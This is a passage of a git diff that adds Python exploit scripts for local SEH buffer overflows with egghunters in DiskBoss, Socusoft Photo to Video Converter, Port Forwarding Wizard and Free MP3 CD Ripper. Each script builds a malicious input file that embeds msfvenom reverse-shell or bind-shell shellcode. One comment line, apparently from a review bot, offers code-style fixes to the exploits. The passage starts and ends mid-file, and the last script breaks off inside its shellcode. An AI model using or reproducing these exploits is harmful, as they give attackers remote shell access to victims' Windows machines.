"\x61\x38\x51\x50\x51\x4e\x6b\x71\x49\x31\x30\x57\x71" +buf += "\x4b\x63\x6e\x6b\x71\x59\x37\x68\x68\x63\x57\x4a\x50" +buf += "\x49\x6e\x6b\x75\x64\x4e\x6b\x43\x31\x68\x56\x35\x61" +buf += "\x59\x6f\x6e\x4c\x69\x51\x48\x4f\x36\x6d\x55\x51\x6f" +buf += "\x37\x65\x68\x4b\x50\x70\x75\x69\x66\x73\x33\x51\x6d" +buf += "\x6a\x58\x35\x6b\x63\x4d\x76\x44\x54\x35\x4d\x34\x43" +buf += "\x68\x4e\x6b\x70\x58\x37\x54\x76\x61\x59\x43\x62\x46" +buf += "\x6c\x4b\x54\x4c\x72\x6b\x6e\x6b\x51\x48\x35\x4c\x35" +buf += "\x51\x79\x43\x6c\x4b\x43\x34\x6c\x4b\x63\x31\x68\x50" +buf += "\x6d\x59\x57\x34\x76\x44\x67\x54\x31\x4b\x51\x4b\x33" +buf += "\x51\x71\x49\x72\x7a\x50\x51\x79\x6f\x69\x70\x43\x6f" +buf += "\x63\x6f\x33\x6a\x6e\x6b\x65\x42\x48\x6b\x6c\x4d\x31" +buf += "\x4d\x50\x68\x45\x63\x55\x62\x73\x30\x75\x50\x30\x68" +buf += "\x44\x37\x73\x43\x45\x62\x43\x6f\x43\x64\x45\x38\x42" +buf += "\x6c\x53\x47\x46\x46\x63\x37\x69\x6f\x69\x45\x48\x38" +buf += "\x4a\x30\x45\x51\x57\x70\x55\x50\x67\x59\x49\x54\x70" +buf += "\x54\x32\x70\x42\x48\x44\x69\x6d\x50\x70\x6b\x67\x70" +buf += "\x79\x6f\x6b\x65\x66\x30\x30\x50\x70\x50\x32\x70\x43" +buf += "\x70\x72\x70\x67\x30\x62\x70\x75\x38\x58\x6a\x36\x6f" +buf += "\x49\x4f\x79\x70\x69\x6f\x48\x55\x4c\x57\x53\x5a\x56" +buf += "\x65\x52\x48\x79\x50\x79\x38\x4f\x54\x6d\x51\x52\x48" +buf += "\x43\x32\x53\x30\x63\x31\x4d\x6b\x6d\x59\x38\x66\x30" +buf += "\x6a\x66\x70\x43\x66\x53\x67\x61\x78\x5a\x39\x6e\x45" +buf += "\x72\x54\x33\x51\x59\x6f\x58\x55\x4b\x35\x59\x50\x44" +buf += "\x34\x66\x6c\x69\x6f\x32\x6e\x65\x58\x31\x65\x4a\x4c" +buf += "\x50\x68\x6a\x50\x68\x35\x39\x32\x73\x66\x49\x6f\x58" +buf += "\x55\x62\x48\x42\x43\x32\x4d\x73\x54\x57\x70\x6b\x39" +buf += "\x39\x73\x66\x37\x76\x37\x42\x77\x55\x61\x49\x66\x50" +buf += "\x6a\x54\x52\x73\x69\x70\x56\x78\x62\x49\x6d\x32\x46" +buf += "\x49\x57\x57\x34\x51\x34\x65\x6c\x53\x31\x65\x51\x4c" +buf += "\x4d\x52\x64\x61\x34\x32\x30\x6b\x76\x47\x70\x72\x64" +buf += 
"\x51\x44\x42\x70\x42\x76\x46\x36\x43\x66\x77\x36\x42" +buf += "\x76\x62\x6e\x32\x76\x71\x46\x70\x53\x46\x36\x33\x58" +buf += "\x61\x69\x58\x4c\x35\x6f\x6b\x36\x6b\x4f\x4b\x65\x4d" +buf += "\x59\x49\x70\x30\x4e\x31\x46\x33\x76\x6b\x4f\x66\x50" +buf += "\x71\x78\x43\x38\x4b\x37\x37\x6d\x73\x50\x6b\x4f\x4b" +buf += "\x65\x6f\x4b\x48\x70\x6c\x75\x4f\x52\x72\x76\x73\x58" +buf += "\x49\x36\x6e\x75\x4d\x6d\x4d\x4d\x59\x6f\x39\x45\x55" +buf += "\x6c\x63\x36\x53\x4c\x66\x6a\x4d\x50\x79\x6b\x6b\x50" +buf += "\x64\x35\x46\x65\x6f\x4b\x72\x67\x45\x43\x50\x72\x70" +buf += "\x6f\x32\x4a\x65\x50\x51\x43\x49\x6f\x59\x45\x41\x41" + +exploit = "A"*4112 +# 0x40012623 - pop pop ret rtl60.bpl +exploit += "\x74\x06\x75\x04" +exploit += "\x23\x26\x01\x40" +exploit += egg +exploit += "C"*(5000-4120-len(egg)) +exploit += "T00WT00W" +exploit += buf + +f = open("exploit.txt", "w") +f.write(exploit) +f.close() \ No newline at end of file diff --git a/exploits/windows/local/48689.py b/exploits/windows/local/48689.py new file mode 100755 index 000000000..ece7e4d0e --- /dev/null +++ b/exploits/windows/local/48689.py 
@@ -0,0 +1,100 @@ +# Exploit Title: DiskBoss 7.7.14 - 'Reports and Data Directory' Buffer Overflow (SEH Egghunter) +# Date: 2020-07-26 +# Exploit Author: MasterVlad +# Vendor Homepage: https://www.diskboss.com/ +# Software Link: https://github.com/x00x00x00x00/diskboss_7.7.14/raw/master/diskboss_setup_v7.7.14.exe +# Version: 7.7.14 +# Vulnerability Type: Local Buffer Overflow +# Tested on: Windows 7 32-bit + +# Proof of Concept: + +# 1. Run the python script +# 2. Open exploit.txt and copy the content to clipboard +# 3. Open diskbsg.exe and go to Tools -> DiskBoss Options +# 4. Go to Advanced and paste the clipboard into the "Reports and Data Directory" field +# 5. Click on Save button + + +#!/usr/bin/python + +# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.164.129 LPORT=443 -b "\x00\x0a\x0d\x13\x14\x15\x16" -f py -e x86/alpha_mixed BufferRegister=EDI +buf = "" +buf += "\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49" +buf += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30" +buf += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42" +buf += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49" +buf += "\x69\x6c\x68\x68\x6e\x62\x55\x50\x45\x50\x43\x30\x63" +buf += "\x50\x6e\x69\x6a\x45\x45\x61\x59\x50\x55\x34\x4e\x6b" +buf += "\x52\x70\x76\x50\x6c\x4b\x73\x62\x76\x6c\x6c\x4b\x70" +buf += "\x52\x42\x34\x6e\x6b\x43\x42\x75\x78\x64\x4f\x48\x37" +buf += "\x42\x6a\x71\x36\x65\x61\x39\x6f\x6e\x4c\x67\x4c\x53" +buf += "\x51\x71\x6c\x76\x62\x56\x4c\x67\x50\x79\x51\x78\x4f" +buf += "\x36\x6d\x43\x31\x79\x57\x6d\x32\x4c\x32\x72\x72\x66" +buf += "\x37\x6e\x6b\x72\x72\x56\x70\x6e\x6b\x32\x6a\x75\x6c" +buf += "\x4e\x6b\x62\x6c\x37\x61\x33\x48\x69\x73\x43\x78\x56" +buf += "\x61\x38\x51\x50\x51\x4e\x6b\x71\x49\x31\x30\x57\x71" +buf += "\x4b\x63\x6e\x6b\x71\x59\x37\x68\x68\x63\x57\x4a\x50" +buf += "\x49\x6e\x6b\x75\x64\x4e\x6b\x43\x31\x68\x56\x35\x61" +buf += "\x59\x6f\x6e\x4c\x69\x51\x48\x4f\x36\x6d\x55\x51\x6f" +buf += 
"\x37\x65\x68\x4b\x50\x70\x75\x69\x66\x73\x33\x51\x6d" +buf += "\x6a\x58\x35\x6b\x63\x4d\x76\x44\x54\x35\x4d\x34\x43" +buf += "\x68\x4e\x6b\x70\x58\x37\x54\x76\x61\x59\x43\x62\x46" +buf += "\x6c\x4b\x54\x4c\x72\x6b\x6e\x6b\x51\x48\x35\x4c\x35" +buf += "\x51\x79\x43\x6c\x4b\x43\x34\x6c\x4b\x63\x31\x68\x50" +buf += "\x6d\x59\x57\x34\x76\x44\x67\x54\x31\x4b\x51\x4b\x33" +buf += "\x51\x71\x49\x72\x7a\x50\x51\x79\x6f\x69\x70\x43\x6f" +buf += "\x63\x6f\x33\x6a\x6e\x6b\x65\x42\x48\x6b\x6c\x4d\x31" +buf += "\x4d\x50\x68\x45\x63\x55\x62\x73\x30\x75\x50\x30\x68" +buf += "\x44\x37\x73\x43\x45\x62\x43\x6f\x43\x64\x45\x38\x42" +buf += "\x6c\x53\x47\x46\x46\x63\x37\x69\x6f\x69\x45\x48\x38" +buf += "\x4a\x30\x45\x51\x57\x70\x55\x50\x67\x59\x49\x54\x70" +buf += "\x54\x32\x70\x42\x48\x44\x69\x6d\x50\x70\x6b\x67\x70" +buf += "\x79\x6f\x6b\x65\x66\x30\x30\x50\x70\x50\x32\x70\x43" +buf += "\x70\x72\x70\x67\x30\x62\x70\x75\x38\x58\x6a\x36\x6f" +buf += "\x49\x4f\x79\x70\x69\x6f\x48\x55\x4c\x57\x53\x5a\x56" +buf += "\x65\x52\x48\x79\x50\x79\x38\x4f\x54\x6d\x51\x52\x48" +buf += "\x43\x32\x53\x30\x63\x31\x4d\x6b\x6d\x59\x38\x66\x30" +buf += "\x6a\x66\x70\x43\x66\x53\x67\x61\x78\x5a\x39\x6e\x45" +buf += "\x72\x54\x33\x51\x59\x6f\x58\x55\x4b\x35\x59\x50\x44" +buf += "\x34\x66\x6c\x69\x6f\x32\x6e\x65\x58\x31\x65\x4a\x4c" +buf += "\x50\x68\x6a\x50\x68\x35\x39\x32\x73\x66\x49\x6f\x58" +buf += "\x55\x62\x48\x42\x43\x32\x4d\x73\x54\x57\x70\x6b\x39" +buf += "\x39\x73\x66\x37\x76\x37\x42\x77\x55\x61\x49\x66\x50" +buf += "\x6a\x54\x52\x73\x69\x70\x56\x78\x62\x49\x6d\x32\x46" +buf += "\x49\x57\x57\x34\x51\x34\x65\x6c\x53\x31\x65\x51\x4c" +buf += "\x4d\x52\x64\x61\x34\x32\x30\x6b\x76\x47\x70\x72\x64" +buf += "\x51\x44\x42\x70\x42\x76\x46\x36\x43\x66\x77\x36\x42" +buf += "\x76\x62\x6e\x32\x76\x71\x46\x70\x53\x46\x36\x33\x58" +buf += "\x61\x69\x58\x4c\x35\x6f\x6b\x36\x6b\x4f\x4b\x65\x4d" +buf += "\x59\x49\x70\x30\x4e\x31\x46\x33\x76\x6b\x4f\x66\x50" +buf += 
"\x71\x78\x43\x38\x4b\x37\x37\x6d\x73\x50\x6b\x4f\x4b" +buf += "\x65\x6f\x4b\x48\x70\x6c\x75\x4f\x52\x72\x76\x73\x58" +buf += "\x49\x36\x6e\x75\x4d\x6d\x4d\x4d\x59\x6f\x39\x45\x55" +buf += "\x6c\x63\x36\x53\x4c\x66\x6a\x4d\x50\x79\x6b\x6b\x50" +buf += "\x64\x35\x46\x65\x6f\x4b\x72\x67\x45\x43\x50\x72\x70" +buf += "\x6f\x32\x4a\x65\x50\x51\x43\x49\x6f\x59\x45\x41\x41" + + +egg = "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x54\x58\x66\x05\x44\x17\x50\x5c\x25\x4A" +egg += "\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x7F\x01\x7F\x01\x2D\x0B\x01\x7F\x01\x2D\x01\x16\x02\x15\x50" +egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x01\x7F\x01\x01\x2D\x50\x0B\x14\x4F\x50" +egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x7F\x7F\x01\x01\x2D\x51\x29\x73\x04\x50" +egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x01\x01\x2C\x50\x2D\x10\x46\x7F\x7F\x50" +egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x45\x7B\x26\x0C\x2D\x7F\x7F\x7F\x7F\x50" +egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x7F\x28\x01\x52\x2D\x7F\x7F\x31\x7F\x50" +egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x72\x4D\x3D\x16\x2D\x7F\x70\x70\x7F\x50" +egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x1A\x7B\x01\x7F\x2D\x7F\x01\x33\x7F\x2D\x01\x02\x01\x02\x50" + +exploit = "A"*4096 +# 0x67031912 - pop pop ret +exploit += "\x74\x06\x75\x04" +exploit += "\x12\x19\x03\x67" +exploit += egg +exploit += "C"*(5000-4104) +exploit += "T00WT00W" +exploit += buf + +f = open("exploit.txt", "w") +f.write(exploit) +f.close() \ No newline at end of file diff --git a/exploits/windows/local/48691.py b/exploits/windows/local/48691.py new file mode 100755 index 000000000..15e4ac77d --- /dev/null +++ b/exploits/windows/local/48691.py 
@@ -0,0 +1,102 @@ +# Exploit Title: Socusoft Photo to Video Converter Professional 8.07 - 'Output Folder' Buffer Overflow (SEH Egghunter) +# Date: 2020-07-23 +# Exploit Author: MasterVlad +# Vendor Homepage: http://www.dvd-photo-slideshow.com/photo-to-video-converter.html +# Software Link: https://www.exploit-db.com/apps/ea1720441edd5990a9d0d1ed564a507e-photo-to-video-pro.exe +# Version: 8.07 +# Vulnerability Type: Local Buffer Overflow +# Tested on: Windows 10 x64 + +# Proof of Concept: + +# 1. Run the python script +# 2. Open exploit.txt and copy the content to clipboard +# 3. Open Socusoft Photo to Video Converter Professional 8.07 and go to Video Output +# 4. Paste the clipboard into the 'Output Folder' field and click on Open + +#!/usr/bin/python + +# Badchars: 22, 2a, 3a, 3c, 3e, 3f, 7c + Non-ascii + +# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.164.129 LPORT=443 -b "\x00\x0a\x0d\x22\x2a\x3a\x3c\x3e\x3f\x7c" -f py -e x86/alpha_mixed BufferRegister=EDI + +buf = "" +buf += "\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49" +buf += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30" +buf += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42" +buf += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49" +buf += "\x4b\x4c\x49\x78\x6d\x52\x55\x50\x65\x50\x37\x70\x53" +buf += "\x50\x6b\x39\x48\x65\x54\x71\x4b\x70\x45\x34\x6c\x4b" +buf += "\x52\x70\x44\x70\x6e\x6b\x52\x72\x54\x4c\x6c\x4b\x42" +buf += "\x72\x66\x74\x4e\x6b\x72\x52\x65\x78\x46\x6f\x6c\x77" +buf += "\x52\x6a\x74\x66\x45\x61\x6b\x4f\x6e\x4c\x45\x6c\x45" +buf += "\x31\x33\x4c\x55\x52\x34\x6c\x51\x30\x4f\x31\x4a\x6f" +buf += "\x54\x4d\x46\x61\x39\x57\x5a\x42\x48\x72\x32\x72\x52" +buf += "\x77\x6c\x4b\x30\x52\x32\x30\x4c\x4b\x72\x6a\x45\x6c" +buf += "\x6e\x6b\x52\x6c\x42\x31\x42\x58\x79\x73\x57\x38\x76" +buf += "\x61\x4e\x31\x32\x71\x4c\x4b\x63\x69\x31\x30\x33\x31" +buf += "\x58\x53\x6e\x6b\x52\x69\x34\x58\x4b\x53\x64\x7a\x30" +buf += 
"\x49\x4e\x6b\x36\x54\x4e\x6b\x63\x31\x69\x46\x55\x61" +buf += "\x79\x6f\x4e\x4c\x4b\x71\x7a\x6f\x54\x4d\x46\x61\x78" +buf += "\x47\x55\x68\x39\x70\x31\x65\x39\x66\x74\x43\x53\x4d" +buf += "\x59\x68\x47\x4b\x51\x6d\x66\x44\x61\x65\x78\x64\x56" +buf += "\x38\x6e\x6b\x61\x48\x37\x54\x76\x61\x6b\x63\x31\x76" +buf += "\x4c\x4b\x66\x6c\x72\x6b\x4e\x6b\x71\x48\x35\x4c\x33" +buf += "\x31\x68\x53\x6e\x6b\x75\x54\x4c\x4b\x56\x61\x6a\x70" +buf += "\x6c\x49\x32\x64\x74\x64\x44\x64\x73\x6b\x31\x4b\x70" +buf += "\x61\x53\x69\x30\x5a\x63\x61\x6b\x4f\x49\x70\x33\x6f" +buf += "\x31\x4f\x31\x4a\x4c\x4b\x37\x62\x48\x6b\x4e\x6d\x63" +buf += "\x6d\x31\x78\x45\x63\x44\x72\x57\x70\x57\x70\x42\x48" +buf += "\x30\x77\x44\x33\x45\x62\x33\x6f\x33\x64\x30\x68\x50" +buf += "\x4c\x34\x37\x44\x66\x53\x37\x79\x6f\x68\x55\x4e\x58" +buf += "\x6a\x30\x63\x31\x53\x30\x33\x30\x75\x79\x68\x44\x42" +buf += "\x74\x46\x30\x71\x78\x71\x39\x6d\x50\x42\x4b\x77\x70" +buf += "\x79\x6f\x59\x45\x62\x70\x56\x30\x76\x30\x32\x70\x37" +buf += "\x30\x56\x30\x31\x50\x66\x30\x53\x58\x78\x6a\x76\x6f" +buf += "\x49\x4f\x6b\x50\x6b\x4f\x6e\x35\x6c\x57\x33\x5a\x34" +buf += "\x45\x61\x78\x59\x50\x4f\x58\x39\x34\x6e\x61\x70\x68" +buf += "\x75\x52\x67\x70\x63\x31\x6f\x4b\x6d\x59\x6a\x46\x61" +buf += "\x7a\x56\x70\x62\x76\x73\x67\x53\x58\x6d\x49\x69\x35" +buf += "\x64\x34\x43\x51\x69\x6f\x6e\x35\x6b\x35\x4b\x70\x72" +buf += "\x54\x76\x6c\x39\x6f\x62\x6e\x65\x58\x64\x35\x6a\x4c" +buf += "\x55\x38\x5a\x50\x4e\x55\x4c\x62\x30\x56\x4b\x4f\x4a" +buf += "\x75\x63\x58\x70\x63\x50\x6d\x70\x64\x47\x70\x6b\x39" +buf += "\x6b\x53\x43\x67\x51\x47\x62\x77\x45\x61\x6a\x56\x43" +buf += "\x5a\x46\x72\x32\x79\x43\x66\x39\x72\x79\x6d\x61\x76" +buf += "\x4b\x77\x61\x54\x76\x44\x55\x6c\x66\x61\x63\x31\x6e" +buf += "\x6d\x43\x74\x76\x44\x74\x50\x4b\x76\x45\x50\x32\x64" +buf += "\x71\x44\x52\x70\x66\x36\x73\x66\x30\x56\x52\x66\x31" +buf += "\x46\x42\x6e\x62\x76\x51\x46\x43\x63\x73\x66\x71\x78" +buf += 
"\x50\x79\x38\x4c\x67\x4f\x4e\x66\x6b\x4f\x69\x45\x6c" +buf += "\x49\x6b\x50\x42\x6e\x63\x66\x42\x66\x59\x6f\x64\x70" +buf += "\x70\x68\x36\x68\x6d\x57\x75\x4d\x51\x70\x79\x6f\x58" +buf += "\x55\x6d\x6b\x5a\x50\x48\x35\x4e\x42\x76\x36\x52\x48" +buf += "\x4d\x76\x4f\x65\x4d\x6d\x6f\x6d\x79\x6f\x4a\x75\x57" +buf += "\x4c\x77\x76\x71\x6c\x57\x7a\x4d\x50\x69\x6b\x69\x70" +buf += "\x31\x65\x65\x55\x4f\x4b\x72\x67\x67\x63\x31\x62\x72" +buf += "\x4f\x53\x5a\x75\x50\x72\x73\x6b\x4f\x5a\x75\x41\x41" + + + +egg = "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x54\x58\x66\x05\x2C\x09\x50\x5c" +egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x7F\x01\x7F\x01\x2D\x0B\x01\x7F\x01\x2D\x01\x16\x02\x15\x50" +egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x01\x7F\x01\x01\x2D\x50\x0B\x14\x4F\x50" +egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x7F\x7F\x01\x01\x2D\x51\x29\x73\x04\x50" +egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x01\x01\x2C\x50\x2D\x10\x46\x7F\x7F\x50" +egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x45\x7B\x26\x0C\x2D\x7F\x7F\x7F\x7F\x50" +egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x7F\x28\x01\x52\x2D\x7F\x7F\x31\x7F\x50" +egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x72\x4D\x3D\x16\x2D\x7F\x70\x70\x7F\x50" +egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x1A\x7B\x01\x7F\x2D\x7F\x01\x33\x7F\x2D\x01\x02\x01\x02\x50" + +exploit = "A"*304 +exploit += "\x74\x06\x75\x04" +# 0x10047a1e +exploit += "\x1e\x7a\x04\x10" +exploit += egg +exploit += "B"*(2000-312-len(egg)) +exploit += "T00WT00W" +exploit += buf + +f = open("exploit.txt", "w") +f.write(exploit) +f.close() \ No newline at end of file diff --git a/exploits/windows/local/48695.py b/exploits/windows/local/48695.py new file mode 100755 index 000000000..226d2afac --- /dev/null +++ b/exploits/windows/local/48695.py 
@@ -0,0 +1,75 @@ +# Exploit Title: Port Forwarding Wizard 4.8.0 - Buffer Overflow (SEH) +# Exploit Author: Sarang Tumne +# Date: 2020-07-18 +# CVE ID: N/A +# Confirmed on release 4.8.0 and 4.5.0 +# Vendor: http://www.port-forwarding.net/ +# Tested on OS- Windows Vista +# Buffer overflow in upRedSun Port Forwarding Wizard 4.8.0 and earlier version allows local +# attackers to execute arbitrary code via a long request in the Register feature. + +############################################### + +#!/usr/bin/python + +file=open("payload.txt","w+b") + +buffer="\x90"*164 +buffer+="\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x73\x61\x72\x61\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7" # EggHunter +buffer+="\x90"*20 + +shellcode="sarasara" #Egg tag- sarasara +shellcode+="\x90"*40 +shellcode+=("\xdd\xc7\xd9\x74\x24\xf4\x58\x50\x59\x49\x49\x49\x49\x49\x49" +"\x49\x49\x49\x43\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a\x41" +"\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42" +"\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x6b" +"\x4c\x6d\x38\x6c\x42\x53\x30\x57\x70\x33\x30\x51\x70\x6e\x69" +"\x78\x65\x36\x51\x6f\x30\x35\x34\x4e\x6b\x52\x70\x54\x70\x4e" +"\x6b\x46\x32\x76\x6c\x6c\x4b\x70\x52\x62\x34\x6e\x6b\x33\x42" +"\x54\x68\x66\x6f\x4e\x57\x71\x5a\x34\x66\x70\x31\x49\x6f\x4e" +"\x4c\x57\x4c\x65\x31\x61\x6c\x37\x72\x54\x6c\x55\x70\x59\x51" +"\x48\x4f\x44\x4d\x43\x31\x4a\x67\x49\x72\x5a\x52\x33\x62\x70" +"\x57\x4c\x4b\x50\x52\x56\x70\x6c\x4b\x73\x7a\x35\x6c\x4c\x4b" +"\x50\x4c\x42\x31\x70\x78\x49\x73\x53\x78\x46\x61\x4a\x71\x52" +"\x71\x4e\x6b\x30\x59\x71\x30\x55\x51\x4a\x73\x4e\x6b\x71\x59" +"\x36\x78\x78\x63\x35\x6a\x37\x39\x6c\x4b\x77\x44\x6e\x6b\x76" +"\x61\x39\x46\x76\x51\x59\x6f\x6e\x4c\x4a\x61\x78\x4f\x54\x4d" +"\x77\x71\x5a\x67\x36\x58\x79\x70\x54\x35\x69\x66\x74\x43\x51" +"\x6d\x58\x78\x55\x6b\x43\x4d\x46\x44\x70\x75\x5a\x44\x50\x58" +"\x4e\x6b\x62\x78\x65\x74\x73\x31\x6b\x63\x42\x46\x6c\x4b\x36" 
+"\x6c\x50\x4b\x4e\x6b\x42\x78\x65\x4c\x33\x31\x69\x43\x4c\x4b" +"\x47\x74\x4e\x6b\x77\x71\x78\x50\x4c\x49\x50\x44\x76\x44\x66" +"\x44\x43\x6b\x61\x4b\x31\x71\x51\x49\x63\x6a\x43\x61\x39\x6f" +"\x49\x70\x61\x4f\x73\x6f\x53\x6a\x4e\x6b\x37\x62\x68\x6b\x6c" +"\x4d\x63\x6d\x45\x38\x56\x53\x30\x32\x47\x70\x47\x70\x55\x38" +"\x62\x57\x74\x33\x67\x42\x31\x4f\x61\x44\x33\x58\x50\x4c\x31" +"\x67\x35\x76\x64\x47\x39\x6f\x6b\x65\x6f\x48\x6a\x30\x37\x71" +"\x73\x30\x67\x70\x57\x59\x48\x44\x30\x54\x66\x30\x75\x38\x67" +"\x59\x6d\x50\x32\x4b\x35\x50\x4b\x4f\x6a\x75\x76\x30\x30\x50" +"\x50\x50\x36\x30\x37\x30\x36\x30\x43\x70\x52\x70\x31\x78\x78" +"\x6a\x56\x6f\x49\x4f\x69\x70\x4b\x4f\x39\x45\x5a\x37\x31\x7a" +"\x44\x45\x61\x78\x49\x50\x39\x38\x56\x58\x30\x6c\x73\x58\x55" +"\x52\x73\x30\x56\x71\x43\x6c\x4c\x49\x4b\x56\x30\x6a\x56\x70" +"\x43\x66\x70\x57\x31\x78\x5a\x39\x49\x35\x62\x54\x50\x61\x39" +"\x6f\x7a\x75\x4f\x75\x6f\x30\x73\x44\x46\x6c\x4b\x4f\x70\x4e" +"\x76\x68\x61\x65\x5a\x4c\x53\x58\x68\x70\x4f\x45\x79\x32\x46" +"\x36\x59\x6f\x4a\x75\x63\x58\x32\x43\x52\x4d\x61\x74\x57\x70" +"\x6b\x39\x4a\x43\x63\x67\x76\x37\x63\x67\x64\x71\x69\x66\x62" +"\x4a\x46\x72\x73\x69\x61\x46\x6a\x42\x6b\x4d\x63\x56\x4a\x67" +"\x71\x54\x71\x34\x67\x4c\x47\x71\x46\x61\x6c\x4d\x53\x74\x37" +"\x54\x46\x70\x38\x46\x63\x30\x37\x34\x70\x54\x50\x50\x36\x36" +"\x61\x46\x52\x76\x53\x76\x53\x66\x50\x4e\x46\x36\x33\x66\x36" +"\x33\x42\x76\x52\x48\x70\x79\x68\x4c\x37\x4f\x4f\x76\x59\x6f" +"\x38\x55\x4f\x79\x6b\x50\x70\x4e\x32\x76\x77\x36\x49\x6f\x46" +"\x50\x55\x38\x44\x48\x6d\x57\x47\x6d\x61\x70\x59\x6f\x6e\x35" +"\x4d\x6b\x4b\x4e\x74\x4e\x64\x72\x39\x7a\x72\x48\x4e\x46\x6c" +"\x55\x6f\x4d\x6d\x4d\x59\x6f\x48\x55\x65\x6c\x66\x66\x71\x6c" +"\x37\x7a\x6f\x70\x79\x6b\x6d\x30\x54\x35\x66\x65\x6f\x4b\x47" +"\x37\x46\x73\x53\x42\x72\x4f\x72\x4a\x55\x50\x66\x33\x49\x6f" +"\x39\x45\x41\x41") +buffer+="\xeb\xb6\x90\x90" #Backward short jump- nseh +buffer+="\x6d\x57\x37\x7c" #PPR- SEH +buffer+="A"*200 
+file.write(buffer+shellcode)
+file.close()
\ No newline at end of file
diff --git a/exploits/windows/local/48696.py b/exploits/windows/local/48696.py
new file mode 100755
index 000000000..e7558d29a
--- /dev/null
+++ b/exploits/windows/local/48696.py
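Review bot: `file=open("payload.txt","w+b")` shadows the Python 2 builtin `file` and opens the output read-write although the script only writes; rename it and use `with open("payload.txt", "wb") as f:` so the handle is closed on every path. The handle is opened on the first statement but written only on the last, so an exception anywhere while building `buffer` or `shellcode` leaves an empty `payload.txt` behind; opening just before the write avoids the stale empty file. 48696.py shadows the same builtin with `file = open("exploit.wav", "wb")`.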
@@ -0,0 +1,62 @@ +# Exploit Title: Free MP3 CD Ripper 2.8 - Stack Buffer Overflow (SEH + Egghunter) +# Date: 2020-07-22 +# Exploit Author: Eduard Palisek +# Vendor Homepage: https://www.cleanersoft.com +# Software Link: https://www.cleanersoft.com/download/FMCRSetup.exe +# Version: 2.8 Build 20140611 +# Tested on: [Windows XP, Professional, Version 2002, SP 3 +#!/usr/bin/python +file = open("exploit.wav", "wb") + +# msfvenom -p windows/shell_bind_tcp LPORT=9001 -a x86 EXITFUNC=thread -e x86/shikata_ga_nai -b "\x00\x0a\x0d\" -f python -v shellcode_bind + +shellcode_bind = b"" +shellcode_bind += b"\xb8\x88\xbf\xa2\x65\xdb\xd6\xd9\x74\x24" +shellcode_bind += b"\xf4\x5a\x2b\xc9\xb1\x53\x83\xc2\x04\x31" +shellcode_bind += b"\x42\x0e\x03\xca\xb1\x40\x90\x36\x25\x06" +shellcode_bind += b"\x5b\xc6\xb6\x67\xd5\x23\x87\xa7\x81\x20" +shellcode_bind += b"\xb8\x17\xc1\x64\x35\xd3\x87\x9c\xce\x91" +shellcode_bind += b"\x0f\x93\x67\x1f\x76\x9a\x78\x0c\x4a\xbd" +shellcode_bind += b"\xfa\x4f\x9f\x1d\xc2\x9f\xd2\x5c\x03\xfd" +shellcode_bind += b"\x1f\x0c\xdc\x89\xb2\xa0\x69\xc7\x0e\x4b" +shellcode_bind += b"\x21\xc9\x16\xa8\xf2\xe8\x37\x7f\x88\xb2" +shellcode_bind += b"\x97\x7e\x5d\xcf\x91\x98\x82\xea\x68\x13" +shellcode_bind += b"\x70\x80\x6a\xf5\x48\x69\xc0\x38\x65\x98" +shellcode_bind += b"\x18\x7d\x42\x43\x6f\x77\xb0\xfe\x68\x4c" +shellcode_bind += b"\xca\x24\xfc\x56\x6c\xae\xa6\xb2\x8c\x63" +shellcode_bind += b"\x30\x31\x82\xc8\x36\x1d\x87\xcf\x9b\x16" +shellcode_bind += b"\xb3\x44\x1a\xf8\x35\x1e\x39\xdc\x1e\xc4" +shellcode_bind += b"\x20\x45\xfb\xab\x5d\x95\xa4\x14\xf8\xde" +shellcode_bind += b"\x49\x40\x71\xbd\x05\xa5\xb8\x3d\xd6\xa1" +shellcode_bind += b"\xcb\x4e\xe4\x6e\x60\xd8\x44\xe6\xae\x1f" +shellcode_bind += b"\xaa\xdd\x17\x8f\x55\xde\x67\x86\x91\x8a" +shellcode_bind += b"\x37\xb0\x30\xb3\xd3\x40\xbc\x66\x49\x48" +shellcode_bind += b"\x1b\xd9\x6c\xb5\xdb\x89\x30\x15\xb4\xc3" +shellcode_bind += b"\xbe\x4a\xa4\xeb\x14\xe3\x4d\x16\x97\x28" +shellcode_bind += 
